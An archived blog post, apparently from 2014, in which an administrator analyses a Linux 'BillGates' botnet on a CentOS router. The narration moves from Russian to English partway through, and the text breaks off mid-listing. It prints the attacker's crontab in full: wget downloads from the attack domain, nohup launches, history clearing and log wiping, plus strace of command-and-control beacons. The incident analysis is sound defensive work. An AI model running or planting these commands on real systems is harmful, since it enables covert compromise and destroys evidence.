{
	"id": "14035c0b-606d-44e6-97d1-b75eab0791c8",
	"created_at": "2026-04-06T01:29:52.354672Z",
	"updated_at": "2026-04-10T13:12:15.400269Z",
	"deleted_at": null,
	"sha1_hash": "b40690b5aa64a997e15007ad8094a99cc8d1c1dd",
	"title": "Исследуем Linux Botnet «BillGates»",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 235126,
	"plain_text": "Исследуем Linux Botnet «BillGates»\r\nBy ValdikSS\r\nPublished: 2014-02-26 · Archived: 2026-04-06 00:43:55 UTC\r\n26 мин\r\n88K\r\nНаписал мне вчера lfatal1ty, говорит, домашний роутер на x86 с CentOS как-то странно себя ведет, грузит\r\nканал под гигабит, и какой-то странный процесс «atddd» загружает процессор. Решил я залезть и\r\nпосмотреть, что же там творится, и сразу понял, что кто-то пробрался на сервер и совершает с ним\r\nнепотребства всякие. В процессах висели wget-ы на домен dgnfd564sdf.com и процессы atddd, cupsdd,\r\ncupsddh, ksapdd, kysapdd, skysapdd и xfsdxd, запущенные из /etc:\r\nСкрытый текст\r\nroot 4741 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/sksapd\r\nroot 4753 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx\r\nroot 4756 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd\r\nroot 4757 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/kysapd\r\nroot 4760 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/ksapd\r\nroot 4764 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/atdd\r\nroot 4767 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/skysapd\r\nК сожалению, процессы не додумался скопировать\r\nhttps://habrahabr.ru/post/213973/\r\nPage 1 of 24\n\nНачальный анализ\r\nСначала я полез смотреть, что же вообще происходит и насколько серьезно была скомпрометирована\r\nсистема. Первое, что мне пришло в голову проверить — /etc/rc.local. Там было следующее:\r\ncd /etc;./ksapdd\r\ncd /etc;./kysapdd\r\ncd /etc;./atddd\r\ncd /etc;./ksapdd\r\ncd /etc;./skysapdd\r\ncd /etc;./xfsdxd\r\n«Хмм, ладно», подумал я. 
I went into root's crontab:\r\n# crontab -e\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n# Notice that tasks will be started based on the cron's system\r\n# daemon's notion of time and timezones.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n# Notice that tasks will be started based on the cron's system\r\n# daemon's notion of time and timezones.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n# Notice that tasks will be started based on 
the cron's system\r\n# daemon's notion of time and timezones.\r\n#\r\n# Output of the crontab jobs (including errors) is sent through\r\n# email to the user the crontab file belongs to (unless redirected).\r\n#\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n…\r\n*/1 * * * * killall -9 nfsd4\r\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n# Notice that tasks will be started based on the cron's system\r\n# daemon's notion of time and timezones.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n…\r\n*/1 * * * * killall -9 profild.key\r\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the 
task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n# Notice that tasks will be started based on the cron's system\r\n…\r\n*/1 * * * * killall -9 DDosl\r\n*/1 * * * * killall -9 lengchao32\r\n*/1 * * * * killall -9 b26\r\n*/1 * * * * killall -9 codelove\r\n*/1 * * * * killall -9 32\r\n*/1 * * * * killall -9 64\r\n*/1 * * * * killall -9 new6\r\n*/1 * * * * killall -9 new4\r\n*/1 * * * * killall -9 node24\r\n*/1 * * * * killall -9 freeBSD\r\n*/99 * * * * killall -9 kysapd\r\n*/98 * * * * killall -9 atdd\r\n*/97 * * * * killall -9 kysapd\r\n*/96 * * * * killall -9 skysapd\r\n*/95 * * * * killall -9 xfsdx\r\n*/94 * * * * killall -9 ksapd\r\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n…\r\n*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd\r\n*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd\r\n*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd\r\n*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd\r\n*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd\r\n*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx\r\n*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd\r\n*/120 * * * * cd /root;rm -rf dir nohup.out\r\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single 
line\r\n…\r\n*/360 * * * * cd /etc;rm -rf dir atdd\r\n*/360 * * * * cd /etc;rm -rf dir ksapd\r\n*/360 * * * * cd /etc;rm -rf dir kysapd\r\n*/360 * * * * cd /etc;rm -rf dir skysapd\r\n*/360 * * * * cd /etc;rm -rf dir sksapd\r\n*/360 * * * * cd /etc;rm -rf dir xfsdx\r\n*/1 * * * * cd /etc;rm -rf dir cupsdd.*\r\n*/1 * * * * cd /etc;rm -rf dir atdd.*\r\n*/1 * * * * cd /etc;rm -rf dir ksapd.*\r\n*/1 * * * * cd /etc;rm -rf dir kysapd.*\r\n*/1 * * * * cd /etc;rm -rf dir skysapd.*\r\n*/1 * * * * cd /etc;rm -rf dir sksapd.*\r\n*/1 * * * * cd /etc;rm -rf dir xfsdx.*\r\n*/1 * * * * chmod 7777 /etc/atdd\r\n*/1 * * * * chmod 7777 /etc/cupsdd\r\n*/1 * * * * chmod 7777 /etc/ksapd\r\n*/1 * * * * chmod 7777 /etc/kysapd\r\n*/1 * * * * chmod 7777 /etc/skysapd\r\n*/1 * * * * chmod 7777 /etc/sksapd\r\n*/1 * * * * chmod 7777 /etc/xfsdx\r\n*/99 * * * * nohup /etc/cupsdd \u003e /dev/null 2\u003e\u00261\u0026\r\n*/100 * * * * nohup /etc/kysapd \u003e /dev/null 2\u003e\u00261\u0026\r\n*/99 * * * * nohup /etc/atdd \u003e /dev/null 2\u003e\u00261\u0026\r\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n…\r\n*/98 * * * * nohup /etc/kysapd \u003e /dev/null 2\u003e\u00261\u0026\r\n*/97 * * * * nohup /etc/skysapd \u003e /dev/null 2\u003e\u00261\u0026\r\n*/96 * * * * nohup /etc/xfsdx \u003e /dev/null 2\u003e\u00261\u0026\r\n*/95 * * * * nohup /etc/ksapd \u003e /dev/null 2\u003e\u00261\u0026\r\n*/1 * * * * echo \"unset MAILCHECK\" \u003e\u003e /etc/profile\r\n*/1 * * * * rm -rf /root/.bash_history\r\n*/1 * * * * touch /root/.bash_history\r\n*/1 * * * * history -r\r\n*/1 * * * * cd /var/log \u003e dmesg\r\n*/1 * * * * cd /var/log \u003e auth.log\r\n*/1 * * * * cd /var/log \u003e alternatives.log\r\n*/1 * * * * cd /var/log \u003e boot.log\r\n*/1 * * * * cd /var/log \u003e btmp\r\n*/1 * * * * cd /var/log \u003e cron\r\n…\r\n…\r\n*/1 * * * * cd /var/log \u003e 
cups\r\n*/1 * * * * cd /var/log \u003e daemon.log\r\n*/1 * * * * cd /var/log \u003e dpkg.log\r\n*/1 * * * * cd /var/log \u003e faillog\r\n*/1 * * * * cd /var/log \u003e kern.log\r\n*/1 * * * * cd /var/log \u003e lastlog\r\n*/1 * * * * cd /var/log \u003e maillog\r\n*/1 * * * * cd /var/log \u003e user.log\r\n*/1 * * * * cd /var/log \u003e Xorg.x.log\r\n*/1 * * * * cd /var/log \u003e anaconda.log\r\n*/1 * * * * cd /var/log \u003e yum.log\r\n*/1 * * * * cd /var/log \u003e secure\r\n*/1 * * * * cd /var/log \u003e wtmp\r\n*/1 * * * * cd /var/log \u003e utmp\r\n*/1 * * * * cd /var/log \u003e messages\r\n*/1 * * * * cd /var/log \u003e spooler\r\n*/1 * * * * cd /var/log \u003e sudolog\r\n*/1 * * * * cd /var/log \u003e aculog\r\n*/1 * * * * cd /var/log \u003e access-log\r\n*/1 * * * * cd /root \u003e .bash_history\r\n*/1 * * * * history -c\r\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\nOuch. It was 183 KB in size, 4036 lines. Have you ever seen a 183 KB crontab? I have.\r\nBy the time I logged in to the server, these processes were no longer doing anything (they were not loading the CPU or using the network). I decided to stop crond so that these rules would not run, and not to kill the processes for now. I attached strace to them:\r\n[root@Fatalsrv etc]# strace -p 3312\r\nProcess 3312 attached - interrupt to quit\r\n[ Process PID=3312 runs in 32 bit mode. ]\r\nrestart_syscall(\u003c... 
resuming interrupted call ...\u003e) = 0\r\nsocket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3\r\nsetsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nfcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)\r\nfcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0\r\nconnect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr(\"116.10.189.246\")}, 16) = -1 EINPROGRES\r\nfcntl64(3, F_GETFL) = 0x802 (flags O_RDWR|O_NONBLOCK)\r\nfcntl64(3, F_SETFL, O_RDWR) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDTIMEO, \"\\17\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nsend(3, \"R\\r\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0Linux 2.6.32-35\"..., 401, 0) = -1 ECONNREFUSED (Connection refused)\r\nclose(3) = 0\r\nnanosleep({15, 0}, NULL) = 0\r\nsocket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3\r\nsetsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nfcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)\r\nfcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0\r\nconnect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr(\"116.10.189.246\")}, 16) = -1 EINPROGRES\r\nfcntl64(3, F_GETFL) = 0x802 (flags O_RDWR|O_NONBLOCK)\r\nfcntl64(3, F_SETFL, O_RDWR) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDTIMEO, \"\\17\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nsend(3, \"R\\r\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0Linux 2.6.32-35\"..., 401, 0) = -1 ECONNREFUSED (Connection refused)\r\nclose(3) = 0\r\nnanosleep({15, 0},\r\n[root@Fatalsrv etc]# strace -p 3268\r\nProcess 3268 attached - interrupt to quit\r\n[ Process PID=3268 runs in 32 bit mode. 
]\r\nrecv(3, 0xfff19338, 4, 0) = -1 ECONNRESET (Connection reset by peer)\r\nclose(3) = 0\r\nfutex(0x816e8a8, FUTEX_WAKE, 1) = 1\r\nfutex(0x816e8a4, FUTEX_WAKE, 1) = 1\r\nnanosleep({15, 0}, NULL) = 0\r\nsocket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3\r\nsetsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nfcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)\r\nfcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0\r\nconnect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr(\"112.90.22.197\")}, 16) = -1 EINPROGRESS\r\nfcntl64(3, F_GETFL) = 0x802 (flags O_RDWR|O_NONBLOCK)\r\nfcntl64(3, F_SETFL, O_RDWR) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDTIMEO, \"\\17\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nsend(3, \"R\\r\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0Linux 2.6.32-35\"..., 401, 0) = 401\r\nsetsockopt(3, SOL_SOCKET, SO_RCVTIMEO, \"\u003c\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nrecv(3, \"\\4\\0\\0\\0\", 4, 0) = 4\r\nsetsockopt(3, SOL_SOCKET, SO_SNDTIMEO, \"\\17\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nsend(3, \"\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\", 27, 0) = 27\r\nsetsockopt(3, SOL_SOCKET, SO_RCVTIMEO, \"\u003c\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nrecv(3, \"\\4\\0\\0\\0\", 4, 0) = 4\r\nsetsockopt(3, SOL_SOCKET, SO_SNDTIMEO, \"\\17\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nsend(3, \"\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\", 27, 0) = 27\r\nsetsockopt(3, SOL_SOCKET, SO_RCVTIMEO, \"\u003c\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nrecv(3, ^C \u003cunfinished ...\u003e\r\nProcess 3268 detached\r\nThe processes were doing almost nothing, only occasionally sending data collected from the machine. I decided to kill them, with SIGKILL of course. 
I cleaned up the crontab, cleaned up /etc/rc.local, deleted these executables from /etc (incidentally, they all had the SUID bit set, and one had the Immunity bit, and if you do not know or do not remember about extended file attributes, you can rack your brain for a long time over why nothing can be done with the file: it can be neither deleted nor modified), and cleaned 422 lines of the following out of /etc/profile:\r\nunset MAILCHECK\r\nWhich means the botnet had been on the machine for about 7 hours. Not that long, but not that short either. I archived all the files and downloaded them.\r\nNow I needed to check whether any system files had been modified. On CentOS it is enough to run:\r\nrpm -Va\r\nThe output of this command, on the whole, pleased me:\r\n[root@Fatalsrv ~]# rpm -Va\r\nS.5....T. c /etc/ppp/chap-secrets\r\nS.5....T. c /etc/issue\r\nS.5....T. c /etc/crontab\r\nS.5....T. c /etc/nagiosgraph/access.conf\r\nS.5....T. c /etc/nagiosgraph/nagiosgraph.conf\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/show.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/showconfig.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/showgraph.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/showgroup.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/showhost.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/showservice.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/testcolor.cgi\r\n.M....... /usr/share/nagiosgraph/htdocs/nagiosgraph.css\r\n.M....... /usr/share/nagiosgraph/htdocs/nagiosgraph.js\r\nS.5....T. /var/log/nagiosgraph/nagiosgraph-cgi.log\r\nS.5....T. /var/log/nagiosgraph/nagiosgraph.log\r\nmissing /usr/java/jre1.7.0_40/lib/install.jar\r\n....L.... /lib/modules/2.6.32-358.2.1.el6.x86_64/build\r\nS.5....T. c /etc/tor/torrc\r\n.M....... /\r\n.......T. c /etc/ppp/options.pptpd\r\nS.5....T. c /etc/pptpd.conf\r\n....L.... c /etc/pam.d/fingerprint-auth\r\n....L.... c /etc/pam.d/password-auth\r\n....L.... c /etc/pam.d/smartcard-auth\r\n....L.... c /etc/pam.d/system-auth\r\nS.5....T. c /etc/rsyslog.conf\r\nS.5....T. 
c /etc/rc.d/rc.local\r\n..5....T. c /etc/sysctl.conf\r\nS.5....T. c /etc/vsftpd/vsftpd.conf\r\n.M....... /var/ftp/pub\r\n..5....T. c /etc/sysconfig/PlexMediaServer\r\n.......T. /usr/lib/plexmediaserver/start.sh\r\nS.5....T. c /etc/sysconfig/lm_sensors\r\nS.5....T. c /etc/php.ini\r\nS.5....T. c /etc/httpd/conf/httpd.conf\r\n.......T. /etc/rc.d/init.d/deluge-daemon\r\nS.5....T. c /etc/cacti/db.php\r\nS.5....T. c /etc/cron.d/cacti\r\nS.5....T. c /etc/httpd/conf.d/cacti.conf\r\n.M....... /usr/share/cacti\r\n.M....... /usr/share/cacti/about.php\r\n.M....... /usr/share/cacti/auth_changepassword.php\r\n.M....... /usr/share/cacti/auth_login.php\r\n.M....... /usr/share/cacti/cdef.php\r\n.M....... /usr/share/cacti/cmd.php\r\n.M....... /usr/share/cacti/color.php\r\n.M....... /usr/share/cacti/data_input.php\r\n.M....... /usr/share/cacti/data_queries.php\r\n.M....... /usr/share/cacti/data_sources.php\r\n.M....... /usr/share/cacti/data_templates.php\r\n.M....... /usr/share/cacti/gprint_presets.php\r\n.M....... /usr/share/cacti/graph.php\r\n.M....... /usr/share/cacti/graph_image.php\r\n.M....... /usr/share/cacti/graph_settings.php\r\n.M....... /usr/share/cacti/graph_templates.php\r\n.M....... /usr/share/cacti/graph_templates_inputs.php\r\n.M....... /usr/share/cacti/graph_templates_items.php\r\n.M....... /usr/share/cacti/graph_view.php\r\n.M....... /usr/share/cacti/graph_xport.php\r\n.M....... /usr/share/cacti/graphs.php\r\n.M....... /usr/share/cacti/graphs_items.php\r\n.M....... /usr/share/cacti/graphs_new.php\r\n.M....... /usr/share/cacti/host.php\r\n.M....... /usr/share/cacti/host_templates.php\r\n.M....... /usr/share/cacti/images\r\n.M....... /usr/share/cacti/images/arrow.gif\r\n.M....... /usr/share/cacti/images/auth_deny.gif\r\n.M....... /usr/share/cacti/images/auth_login.gif\r\n.M....... /usr/share/cacti/images/auth_logout.gif\r\n.M....... /usr/share/cacti/images/button_add.gif\r\n.M....... 
/usr/share/cacti/images/button_cancel.gif\r\n.M....... /usr/share/cacti/images/button_cancel2.gif\r\n.M....... /usr/share/cacti/images/button_clear.gif\r\n.M....... /usr/share/cacti/images/button_colapse_all.gif\r\n.M....... /usr/share/cacti/images/button_create.gif\r\n.M....... /usr/share/cacti/images/button_default.gif\r\n.M....... /usr/share/cacti/images/button_delete.gif\r\n.M....... /usr/share/cacti/images/button_expand_all.gif\r\n.M....... /usr/share/cacti/images/button_export.gif\r\n.M....... /usr/share/cacti/images/button_go.gif\r\n.M....... /usr/share/cacti/images/button_help.gif\r\n.M....... /usr/share/cacti/images/button_import.gif\r\n.M....... /usr/share/cacti/images/button_no.gif\r\n.M....... /usr/share/cacti/images/button_purge.gif\r\n.M....... /usr/share/cacti/images/button_refresh.gif\r\n.M....... /usr/share/cacti/images/button_save.gif\r\n.M....... /usr/share/cacti/images/button_view.gif\r\n.M....... /usr/share/cacti/images/button_yes.gif\r\n.M....... /usr/share/cacti/images/cacti_about_logo.gif\r\n.M....... /usr/share/cacti/images/cacti_backdrop.gif\r\n.M....... /usr/share/cacti/images/cacti_backdrop2.gif\r\n.M....... /usr/share/cacti/images/cacti_logo.gif\r\n.M....... /usr/share/cacti/images/calendar.gif\r\n.M....... /usr/share/cacti/images/delete_icon.gif\r\n.M....... /usr/share/cacti/images/delete_icon_large.gif\r\n.M....... /usr/share/cacti/images/disable_icon.png\r\n.M....... /usr/share/cacti/images/enable_icon.png\r\n.M....... /usr/share/cacti/images/enable_icon_disabled.png\r\n.M....... /usr/share/cacti/images/favicon.ico\r\n.M....... /usr/share/cacti/images/graph_page_top.gif\r\n.M....... /usr/share/cacti/images/graph_properties.gif\r\n.M....... /usr/share/cacti/images/graph_query.png\r\n.M....... /usr/share/cacti/images/graph_zoom.gif\r\n.M....... /usr/share/cacti/images/hide.gif\r\n.M....... /usr/share/cacti/images/install_icon.png\r\n.M....... /usr/share/cacti/images/install_icon_disabled.png\r\n.M....... 
/usr/share/cacti/images/left_border.gif\r\n.M....... /usr/share/cacti/images/menu_line.gif\r\n.M....... /usr/share/cacti/images/menuarrow.gif\r\n.M....... /usr/share/cacti/images/move_down.gif\r\n.M....... /usr/share/cacti/images/move_left.gif\r\n.M....... /usr/share/cacti/images/move_right.gif\r\n.M....... /usr/share/cacti/images/move_up.gif\r\n.M....... /usr/share/cacti/images/reload_icon_small.gif\r\n.M....... /usr/share/cacti/images/shadow.gif\r\n.M....... /usr/share/cacti/images/shadow_gray.gif\r\n.M....... /usr/share/cacti/images/show.gif\r\n.M....... /usr/share/cacti/images/tab_cacti.gif\r\n.M....... /usr/share/cacti/images/tab_console.gif\r\n.M....... /usr/share/cacti/images/tab_console_down.gif\r\n.M....... /usr/share/cacti/images/tab_graphs.gif\r\n.M....... /usr/share/cacti/images/tab_graphs_down.gif\r\n.M....... /usr/share/cacti/images/tab_mode_list.gif\r\n.M....... /usr/share/cacti/images/tab_mode_list_down.gif\r\n.M....... /usr/share/cacti/images/tab_mode_preview.gif\r\n.M....... /usr/share/cacti/images/tab_mode_preview_down.gif\r\n.M....... /usr/share/cacti/images/tab_mode_tree.gif\r\n.M....... /usr/share/cacti/images/tab_mode_tree_down.gif\r\n.M....... /usr/share/cacti/images/tab_settings.gif\r\n.M....... /usr/share/cacti/images/tab_settings_down.gif\r\n.M....... /usr/share/cacti/images/transparent_line.gif\r\n.M....... /usr/share/cacti/images/uninstall_icon.gif\r\n.M....... /usr/share/cacti/images/view_none.gif\r\n.M....... /usr/share/cacti/include\r\n.M....... /usr/share/cacti/include/auth.php\r\n.M....... /usr/share/cacti/include/bottom_footer.php\r\n.M....... /usr/share/cacti/include/global.php\r\n.M....... /usr/share/cacti/include/global_arrays.php\r\n.M....... /usr/share/cacti/include/global_constants.php\r\n.M....... /usr/share/cacti/include/global_form.php\r\n.M....... /usr/share/cacti/include/global_settings.php\r\n.M....... /usr/share/cacti/include/jscalendar\r\n.M....... 
/usr/share/cacti/include/jscalendar/calendar-setup.js\r\n.M....... /usr/share/cacti/include/jscalendar/calendar.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-af.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-al.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-bg.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-big5-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-big5.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-br.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ca.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-cs-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-cs-win.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-da.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-de.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-du.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-el.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-en.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-es.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-fi.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-fr.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-he-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-hr-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-hr.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-hu.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-it.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-jp.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ko-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ko.js\r\n.M....... 
/usr/share/cacti/include/jscalendar/lang/calendar-lt-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-lt.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-lv.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-nl.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-no.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-pl-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-pl.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-pt.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ro.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ru.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ru_win_.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-si.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-sk.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-sp.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-sv.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-tr.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-zh.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/cn_utf8.js\r\n.M....... /usr/share/cacti/include/layout.js\r\n.M....... /usr/share/cacti/include/main.css\r\n.M....... /usr/share/cacti/include/plugins.php\r\n.M....... /usr/share/cacti/include/top_graph_header.php\r\n.M....... /usr/share/cacti/include/top_header.php\r\n.M....... /usr/share/cacti/include/treeview\r\n.M....... /usr/share/cacti/include/treeview/ftiens4.js\r\n.M....... /usr/share/cacti/include/treeview/ftiens4_export.js\r\n.M....... /usr/share/cacti/include/treeview/ftv2blank.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2lastnode.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2mlastnode.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2mnode.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2node.gif\r\n.M....... 
